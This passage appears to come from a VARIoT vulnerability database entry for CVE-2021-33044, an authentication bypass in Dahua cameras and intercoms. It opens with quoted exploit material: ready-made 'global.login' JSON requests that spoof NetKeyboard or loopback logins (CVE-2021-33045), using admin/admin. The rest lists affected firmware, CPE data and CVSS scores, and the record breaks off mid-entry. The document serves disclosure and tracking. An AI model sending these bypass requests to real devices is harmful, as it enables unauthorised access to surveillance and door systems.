Successful bypass returns: {"id":1,"params":{"keepAliveInterval":60},"result":true,"session":}

[Example] { "method": "global.login", "params": { "userName": "admin", "loginType": "Direct", "clientType": "NetKeyboard", "authorityType": "Default", "passwordType": "Default", "password": "Not Used" }, "id": 1, "session": 0 }

-=[Loopback Vulnerability]=-

CVE-2021-33045

Vulnerability: "ipAddr": "127.0.0.1", "loginType": "Loopback", "clientType": "Local",

Vulnerable device types: IPC/VTH/VTO/NVR/DVR (tested) Vulnerable Firmware: Firmware version older than beginning/mid 2020. Protocol: DHIP

Details: Setting above "Vulnerability" on "Vulnerable device types" during 1st or 2nd "global.login" sequence pretends that the login request comes from "loopback" and will therefore bypass legitimate authentication.

Successful bypass returns: {"id":1,"params":{"keepAliveInterval":60},"result":true,"session":}

[Example] Random MD5 with l/p: admin/admin { "method": "global.login", "params": { "userName": "admin", "ipAddr": "127.0.0.1", "loginType": "Loopback", "clientType": "Local", "authorityType": "Default", "passwordType": "Default", "password": "[REDACTED]" }, "id": 1, "session": 0 }

Plain text with l/p: admin/admin { "method": "global.login", "params": { "userName": "admin", "ipAddr": "127.0.0.1", "loginType": "Loopback", "clientType": "Local", "authorityType": "Default", "passwordType": "Plain", "password": "admin" }, "id": 1, "session": 0 }

[ETX]

Show details on source website


{
   "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
      affected_products: {
         "@id": "https://www.variotdbs.pl/ref/affected_products",
      },
      configurations: {
         "@id": "https://www.variotdbs.pl/ref/configurations",
      },
      credits: {
         "@id": "https://www.variotdbs.pl/ref/credits",
      },
      cvss: {
         "@id": "https://www.variotdbs.pl/ref/cvss/",
      },
      description: {
         "@id": "https://www.variotdbs.pl/ref/description/",
      },
      exploit_availability: {
         "@id": "https://www.variotdbs.pl/ref/exploit_availability/",
      },
      external_ids: {
         "@id": "https://www.variotdbs.pl/ref/external_ids/",
      },
      iot: {
         "@id": "https://www.variotdbs.pl/ref/iot/",
      },
      iot_taxonomy: {
         "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/",
      },
      patch: {
         "@id": "https://www.variotdbs.pl/ref/patch/",
      },
      problemtype_data: {
         "@id": "https://www.variotdbs.pl/ref/problemtype_data/",
      },
      references: {
         "@id": "https://www.variotdbs.pl/ref/references/",
      },
      sources: {
         "@id": "https://www.variotdbs.pl/ref/sources/",
      },
      sources_release_date: {
         "@id": "https://www.variotdbs.pl/ref/sources_release_date/",
      },
      sources_update_date: {
         "@id": "https://www.variotdbs.pl/ref/sources_update_date/",
      },
      threat_type: {
         "@id": "https://www.variotdbs.pl/ref/threat_type/",
      },
      title: {
         "@id": "https://www.variotdbs.pl/ref/title/",
      },
      type: {
         "@id": "https://www.variotdbs.pl/ref/type/",
      },
   },
   "@id": "https://www.variotdbs.pl/vuln/VAR-202109-1875",
   affected_products: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
         data: {
            "@container": "@list",
         },
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
            "@id": "https://www.variotdbs.pl/ref/sources",
         },
      },
      data: [
         {
            model: "ipc-hx5xxx",
            scope: null,
            trust: 1.6,
            vendor: "dahua",
            version: null,
         },
         {
            model: "ipc-hx3xxx",
            scope: null,
            trust: 1.6,
            vendor: "dahua",
            version: null,
         },
         {
            model: "ipc-hum7xxx",
            scope: null,
            trust: 1.6,
            vendor: "dahua",
            version: null,
         },
         {
            model: "ipc-hum7xxx",
            scope: "lt",
            trust: 1,
            vendor: "dahuasecurity",
            version: "2.820.0000000.5.r.210705",
         },
         {
            model: "vto-75x95x",
            scope: "lt",
            trust: 1,
            vendor: "dahuasecurity",
            version: "4.300.0000003.0.r.210714",
         },
         {
            model: "vth-542xh",
            scope: "lt",
            trust: 1,
            vendor: "dahuasecurity",
            version: "4.500.0000002.0.r.210715",
         },
         {
            model: "tpc-sd2221",
            scope: "lte",
            trust: 1,
            vendor: "dahuasecurity",
            version: "2.630.0000000.7.r.210707",
         },
         {
            model: "tpc-bf2221",
            scope: "lt",
            trust: 1,
            vendor: "dahuasecurity",
            version: "2.630.0000000.10.r.210707",
         },
         {
            model: "vto-65xxx",
            scope: "lt",
            trust: 1,
            vendor: "dahuasecurity",
            version: "4.300.0000004.0.r.210715",
         },
         {
            model: "sd1a1",
            scope: "lt",
            trust: 1,
            vendor: "dahuasecurity",
            version: "2.812.0000007.0.r.210706",
         },
         {
            model: "sd6al",
            scope: "lt",
            trust: 1,
            vendor: "dahuasecurity",
            version: "2.812.0000007.0.r.210706",
         },
         {
            model: "sd50",
            scope: "lt",
            trust: 1,
            vendor: "dahuasecurity",
            version: "2.812.0000007.0.r.210706",
         },
         {
            model: "sd41",
            scope: "lt",
            trust: 1,
            vendor: "dahuasecurity",
            version: "2.812.0000007.0.r.210706",
         },
         {
            model: "tpc-bf5x21",
            scope: "lt",
            trust: 1,
            vendor: "dahuasecurity",
            version: "2.630.0000000.8.r.210630",
         },
         {
            model: "ipc-hx3xxx",
            scope: "lt",
            trust: 1,
            vendor: "dahuasecurity",
            version: "2.800.0000000.29.r.210630",
         },
         {
            model: "tpc-bf1241",
            scope: "lt",
            trust: 1,
            vendor: "dahuasecurity",
            version: "2.630.0000000.6.r.210707",
         },
         {
            model: "tpc-sd8x21",
            scope: "lt",
            trust: 1,
            vendor: "dahuasecurity",
            version: "2.630.0000000.9.r.210706",
         },
         {
            model: "sd22",
            scope: "lt",
            trust: 1,
            vendor: "dahuasecurity",
            version: "2.812.0000007.0.r.210706",
         },
         {
            model: "ipc-hx5xxx",
            scope: "lt",
            trust: 1,
            vendor: "dahuasecurity",
            version: "2.820.0000000.18.r.210705",
         },
         {
            model: "sd52c",
            scope: "lt",
            trust: 1,
            vendor: "dahuasecurity",
            version: "2.812.0000007.0.r.210706",
         },
         {
            model: "tpc-bf5x01",
            scope: "lt",
            trust: 1,
            vendor: "dahuasecurity",
            version: "2.630.0000000.12.r.210707",
         },
         {
            model: "tpc-pt8x21b",
            scope: "lt",
            trust: 1,
            vendor: "dahuasecurity",
            version: "2.630.0000000.10.r.210701",
         },
         {
            model: "sd22",
            scope: null,
            trust: 0.8,
            vendor: "dahua",
            version: null,
         },
         {
            model: "tpc-bf1241",
            scope: null,
            trust: 0.8,
            vendor: "dahua",
            version: null,
         },
         {
            model: "sd6al",
            scope: null,
            trust: 0.8,
            vendor: "dahua",
            version: null,
         },
         {
            model: "sd41",
            scope: null,
            trust: 0.8,
            vendor: "dahua",
            version: null,
         },
         {
            model: "sd50",
            scope: null,
            trust: 0.8,
            vendor: "dahua",
            version: null,
         },
         {
            model: "sd1a1",
            scope: null,
            trust: 0.8,
            vendor: "dahua",
            version: null,
         },
         {
            model: "sd52c",
            scope: null,
            trust: 0.8,
            vendor: "dahua",
            version: null,
         },
         {
            model: "dhi-asi7213y-v3-t1",
            scope: null,
            trust: 0.8,
            vendor: "dahua",
            version: null,
         },
         {
            model: "ipc-hx2xxx",
            scope: null,
            trust: 0.8,
            vendor: "dahua",
            version: null,
         },
         {
            model: "thermal tpc-sd2221",
            scope: null,
            trust: 0.8,
            vendor: "dahua",
            version: null,
         },
         {
            model: "ptz dome camera sd52c",
            scope: null,
            trust: 0.8,
            vendor: "dahua",
            version: null,
         },
         {
            model: "thermal tpc-sd8x21",
            scope: null,
            trust: 0.8,
            vendor: "dahua",
            version: null,
         },
         {
            model: "ptz dome camera sd6al",
            scope: null,
            trust: 0.8,
            vendor: "dahua",
            version: null,
         },
         {
            model: "thermal tpc-pt8x21b",
            scope: null,
            trust: 0.8,
            vendor: "dahua",
            version: null,
         },
         {
            model: "thermal tpc-bf2221",
            scope: null,
            trust: 0.8,
            vendor: "dahua",
            version: null,
         },
         {
            model: "ptz dome camera sd49",
            scope: null,
            trust: 0.8,
            vendor: "dahua",
            version: null,
         },
         {
            model: "ptz dome camera sd1a1",
            scope: null,
            trust: 0.8,
            vendor: "dahua",
            version: null,
         },
         {
            model: "ptz dome camera sd50",
            scope: null,
            trust: 0.8,
            vendor: "dahua",
            version: null,
         },
         {
            model: "vth542xh",
            scope: null,
            trust: 0.8,
            vendor: "dahua",
            version: null,
         },
         {
            model: "ipc-hx8xxx",
            scope: null,
            trust: 0.8,
            vendor: "dahua",
            version: null,
         },
         {
            model: "thermal tpc-bf5xxx",
            scope: null,
            trust: 0.8,
            vendor: "dahua",
            version: null,
         },
         {
            model: "ipc-hx5 xxx",
            scope: null,
            trust: 0.8,
            vendor: "dahua",
            version: null,
         },
         {
            model: "thermal tpc-bf1241",
            scope: null,
            trust: 0.8,
            vendor: "dahua",
            version: null,
         },
         {
            model: "ptz dome camera sd22",
            scope: null,
            trust: 0.8,
            vendor: "dahua",
            version: null,
         },
         {
            model: "vto65xxx",
            scope: null,
            trust: 0.8,
            vendor: "dahua",
            version: null,
         },
         {
            model: "ipc-hx1xxx",
            scope: null,
            trust: 0.8,
            vendor: "dahua",
            version: null,
         },
         {
            model: "vto75x95x",
            scope: "eq",
            trust: 0.8,
            vendor: "dahua",
            version: "build time  but  2021  year  6  versions older than month",
         },
         {
            model: "ipc",
            scope: null,
            trust: 0.6,
            vendor: "dahua",
            version: null,
         },
         {
            model: "ipc-hx3xxx versions which build time before june",
            scope: "eq",
            trust: 0.6,
            vendor: "dahua",
            version: "2021",
         },
         {
            model: "hx5xxx versions which build time before june",
            scope: "eq",
            trust: 0.6,
            vendor: "dahua",
            version: "2021",
         },
         {
            model: "hum7xxx versions which build time before june",
            scope: "eq",
            trust: 0.6,
            vendor: "dahua",
            version: "2021",
         },
         {
            model: "vto75x95x versions which build time before june",
            scope: "eq",
            trust: 0.6,
            vendor: "dahua",
            version: "2021",
         },
         {
            model: "vto65xxx versions which build time before june",
            scope: "eq",
            trust: 0.6,
            vendor: "dahua",
            version: "2021",
         },
         {
            model: "vth542xh versions which build time before june",
            scope: "eq",
            trust: 0.6,
            vendor: "dahua",
            version: "2021",
         },
         {
            model: "ptz dome camera sd1a1 versions which build time before june",
            scope: "eq",
            trust: 0.6,
            vendor: "dahua",
            version: "2021",
         },
         {
            model: "sd22 versions which build time before june",
            scope: "eq",
            trust: 0.6,
            vendor: "dahua",
            version: "2021",
         },
         {
            model: "sd49 versions which build time before june",
            scope: "eq",
            trust: 0.6,
            vendor: "dahua",
            version: "2021",
         },
         {
            model: "sd50 versions which build time before june",
            scope: "eq",
            trust: 0.6,
            vendor: "dahua",
            version: "2021",
         },
         {
            model: "sd52c versions which build time before june",
            scope: "eq",
            trust: 0.6,
            vendor: "dahua",
            version: "2021",
         },
         {
            model: "sd6al versions which build time before june",
            scope: "eq",
            trust: 0.6,
            vendor: "dahua",
            version: "2021",
         },
         {
            model: "thermal tpc-bf1241 versions which build time before june",
            scope: "eq",
            trust: 0.6,
            vendor: "dahua",
            version: "2021",
         },
         {
            model: "tpc-bf2221 versions which build time before june",
            scope: "eq",
            trust: 0.6,
            vendor: "dahua",
            version: "2021",
         },
         {
            model: "tpc-sd2221 versions which build time before june",
            scope: "eq",
            trust: 0.6,
            vendor: "dahua",
            version: "2021",
         },
         {
            model: "tpc-bf5xxx versions which build time before june",
            scope: "eq",
            trust: 0.6,
            vendor: "dahua",
            version: "2021",
         },
         {
            model: "tpc-sd8x21 versions which build time before june",
            scope: "eq",
            trust: 0.6,
            vendor: "dahua",
            version: "2021",
         },
         {
            model: "tpc-pt8x21b versions which build time before june",
            scope: "eq",
            trust: 0.6,
            vendor: "dahua",
            version: "2021",
         },
      ],
      sources: [
         {
            db: "CNVD",
            id: "CNVD-2021-103421",
         },
         {
            db: "CNVD",
            id: "CNVD-2021-70816",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2021-012422",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2024-000007",
         },
         {
            db: "NVD",
            id: "CVE-2021-33044",
         },
      ],
   },
   configurations: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/configurations#",
         children: {
            "@container": "@list",
         },
         cpe_match: {
            "@container": "@list",
         },
         data: {
            "@container": "@list",
         },
         nodes: {
            "@container": "@list",
         },
      },
      data: [
         {
            CVE_data_version: "4.0",
            nodes: [
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:dahuasecurity:ipc-hum7xxx_firmware:*:*:*:*:*:*:*:*",
                              cpe_name: [],
                              versionEndExcluding: "2.820.0000000.5.r.210705",
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:dahuasecurity:ipc-hum7xxx:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:dahuasecurity:ipc-hx3xxx_firmware:*:*:*:*:*:*:*:*",
                              cpe_name: [],
                              versionEndExcluding: "2.800.0000000.29.r.210630",
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:dahuasecurity:ipc-hx3xxx:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:dahuasecurity:ipc-hx5xxx_firmware:*:*:*:*:*:*:*:*",
                              cpe_name: [],
                              versionEndExcluding: "2.820.0000000.18.r.210705",
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:dahuasecurity:ipc-hx5xxx:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:dahuasecurity:sd1a1_firmware:*:*:*:*:*:*:*:*",
                              cpe_name: [],
                              versionEndExcluding: "2.812.0000007.0.r.210706",
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:dahuasecurity:sd1a1:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:dahuasecurity:sd22_firmware:*:*:*:*:*:*:*:*",
                              cpe_name: [],
                              versionEndExcluding: "2.812.0000007.0.r.210706",
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:dahuasecurity:sd22:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:dahuasecurity:sd41_firmware:*:*:*:*:*:*:*:*",
                              cpe_name: [],
                              versionEndExcluding: "2.812.0000007.0.r.210706",
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:dahuasecurity:sd41:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:dahuasecurity:sd50_firmware:*:*:*:*:*:*:*:*",
                              cpe_name: [],
                              versionEndExcluding: "2.812.0000007.0.r.210706",
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:dahuasecurity:sd50:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:dahuasecurity:sd52c_firmware:*:*:*:*:*:*:*:*",
                              cpe_name: [],
                              versionEndExcluding: "2.812.0000007.0.r.210706",
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:dahuasecurity:sd52c:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:dahuasecurity:sd6al_firmware:*:*:*:*:*:*:*:*",
                              cpe_name: [],
                              versionEndExcluding: "2.812.0000007.0.r.210706",
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:dahuasecurity:sd6al:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:dahuasecurity:tpc-bf1241_firmware:*:*:*:*:*:*:*:*",
                              cpe_name: [],
                              versionEndExcluding: "2.630.0000000.6.r.210707",
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:dahuasecurity:tpc-bf1241:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:dahuasecurity:tpc-bf2221_firmware:*:*:*:*:*:*:*:*",
                              cpe_name: [],
                              versionEndExcluding: "2.630.0000000.10.r.210707",
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:dahuasecurity:tpc-bf2221:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:dahuasecurity:tpc-bf5x01_firmware:*:*:*:*:*:*:*:*",
                              cpe_name: [],
                              versionEndExcluding: "2.630.0000000.12.r.210707",
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:dahuasecurity:tpc-bf5x01:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:dahuasecurity:tpc-pt8x21b_firmware:*:*:*:*:*:*:*:*",
                              cpe_name: [],
                              versionEndExcluding: "2.630.0000000.10.r.210701",
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:dahuasecurity:tpc-pt8x21b:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:dahuasecurity:tpc-sd2221_firmware:*:*:*:*:*:*:*:*",
                              cpe_name: [],
                              versionEndIncluding: "2.630.0000000.7.r.210707",
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:dahuasecurity:tpc-sd2221:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:dahuasecurity:tpc-sd8x21_firmware:*:*:*:*:*:*:*:*",
                              cpe_name: [],
                              versionEndExcluding: "2.630.0000000.9.r.210706",
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:dahuasecurity:tpc-sd8x21:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:dahuasecurity:vto-65xxx_firmware:*:*:*:*:*:*:*:*",
                              cpe_name: [],
                              versionEndExcluding: "4.300.0000004.0.r.210715",
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:dahuasecurity:vto-65xxx:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:dahuasecurity:vto-75x95x_firmware:*:*:*:*:*:*:*:*",
                              cpe_name: [],
                              versionEndExcluding: "4.300.0000003.0.r.210714",
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:dahuasecurity:vto-75x95x:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:dahuasecurity:vth-542xh_firmware:*:*:*:*:*:*:*:*",
                              cpe_name: [],
                              versionEndExcluding: "4.500.0000002.0.r.210715",
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:dahuasecurity:vth-542xh:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:dahuasecurity:tpc-bf5x21_firmware:*:*:*:*:*:*:*:*",
                              cpe_name: [],
                              versionEndExcluding: "2.630.0000000.8.r.210630",
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:dahuasecurity:tpc-bf5x21:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
            ],
         },
      ],
      sources: [
         {
            db: "NVD",
            id: "CVE-2021-33044",
         },
      ],
   },
   credits: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/credits#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: "bashis",
      sources: [
         {
            db: "PACKETSTORM",
            id: "164423",
         },
      ],
      trust: 0.1,
   },
   cve: "CVE-2021-33044",
   cvss: {
      "@context": {
         cvssV2: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#",
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2",
         },
         cvssV3: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#",
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/",
         },
         severity: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/cvss/severity#",
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity",
         },
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
            "@id": "https://www.variotdbs.pl/ref/sources",
         },
      },
      data: [
         {
            cvssV2: [
               {
                  acInsufInfo: false,
                  accessComplexity: "LOW",
                  accessVector: "NETWORK",
                  authentication: "NONE",
                  author: "NVD",
                  availabilityImpact: "COMPLETE",
                  baseScore: 10,
                  confidentialityImpact: "COMPLETE",
                  exploitabilityScore: 10,
                  impactScore: 10,
                  integrityImpact: "COMPLETE",
                  obtainAllPrivilege: false,
                  obtainOtherPrivilege: false,
                  obtainUserPrivilege: false,
                  severity: "HIGH",
                  trust: 1,
                  userInteractionRequired: false,
                  vectorString: "AV:N/AC:L/Au:N/C:C/I:C/A:C",
                  version: "2.0",
               },
               {
                  acInsufInfo: null,
                  accessComplexity: "Low",
                  accessVector: "Network",
                  authentication: "None",
                  author: "NVD",
                  availabilityImpact: "Complete",
                  baseScore: 10,
                  confidentialityImpact: "Complete",
                  exploitabilityScore: null,
                  id: "CVE-2021-33044",
                  impactScore: null,
                  integrityImpact: "Complete",
                  obtainAllPrivilege: null,
                  obtainOtherPrivilege: null,
                  obtainUserPrivilege: null,
                  severity: "High",
                  trust: 0.8,
                  userInteractionRequired: null,
                  vectorString: "AV:N/AC:L/Au:N/C:C/I:C/A:C",
                  version: "2.0",
               },
               {
                  acInsufInfo: null,
                  accessComplexity: "High",
                  accessVector: "Network",
                  authentication: "None",
                  author: "IPA",
                  availabilityImpact: "Complete",
                  baseScore: 7.6,
                  confidentialityImpact: "Complete",
                  exploitabilityScore: null,
                  id: "JVNDB-2024-000007",
                  impactScore: null,
                  integrityImpact: "Complete",
                  obtainAllPrivilege: null,
                  obtainOtherPrivilege: null,
                  obtainUserPrivilege: null,
                  severity: "High",
                  trust: 0.8,
                  userInteractionRequired: null,
                  vectorString: "AV:N/AC:H/Au:N/C:C/I:C/A:C",
                  version: "2.0",
               },
               {
                  accessComplexity: "LOW",
                  accessVector: "NETWORK",
                  authentication: "NONE",
                  author: "CNVD",
                  availabilityImpact: "COMPLETE",
                  baseScore: 10,
                  confidentialityImpact: "COMPLETE",
                  exploitabilityScore: 10,
                  id: "CNVD-2021-103421",
                  impactScore: 10,
                  integrityImpact: "COMPLETE",
                  severity: "HIGH",
                  trust: 0.6,
                  vectorString: "AV:N/AC:L/Au:N/C:C/I:C/A:C",
                  version: "2.0",
               },
               {
                  accessComplexity: "HIGH",
                  accessVector: "NETWORK",
                  authentication: "NONE",
                  author: "CNVD",
                  availabilityImpact: "COMPLETE",
                  baseScore: 7.6,
                  confidentialityImpact: "COMPLETE",
                  exploitabilityScore: 4.9,
                  id: "CNVD-2021-70816",
                  impactScore: 10,
                  integrityImpact: "COMPLETE",
                  severity: "HIGH",
                  trust: 0.6,
                  vectorString: "AV:N/AC:H/Au:N/C:C/I:C/A:C",
                  version: "2.0",
               },
            ],
            cvssV3: [
               {
                  attackComplexity: "LOW",
                  attackVector: "NETWORK",
                  author: "NVD",
                  availabilityImpact: "HIGH",
                  baseScore: 9.8,
                  baseSeverity: "CRITICAL",
                  confidentialityImpact: "HIGH",
                  exploitabilityScore: 3.9,
                  impactScore: 5.9,
                  integrityImpact: "HIGH",
                  privilegesRequired: "NONE",
                  scope: "UNCHANGED",
                  trust: 1,
                  userInteraction: "NONE",
                  vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
                  version: "3.1",
               },
               {
                  attackComplexity: "Low",
                  attackVector: "Network",
                  author: "NVD",
                  availabilityImpact: "High",
                  baseScore: 9.8,
                  baseSeverity: "Critical",
                  confidentialityImpact: "High",
                  exploitabilityScore: null,
                  id: "CVE-2021-33044",
                  impactScore: null,
                  integrityImpact: "High",
                  privilegesRequired: "None",
                  scope: "Unchanged",
                  trust: 0.8,
                  userInteraction: "None",
                  vectorString: "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
                  version: "3.0",
               },
               {
                  attackComplexity: "High",
                  attackVector: "Network",
                  author: "IPA",
                  availabilityImpact: "High",
                  baseScore: 8.1,
                  baseSeverity: "High",
                  confidentialityImpact: "High",
                  exploitabilityScore: null,
                  id: "JVNDB-2024-000007",
                  impactScore: null,
                  integrityImpact: "High",
                  privilegesRequired: "None",
                  scope: "Unchanged",
                  trust: 0.8,
                  userInteraction: "None",
                  vectorString: "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
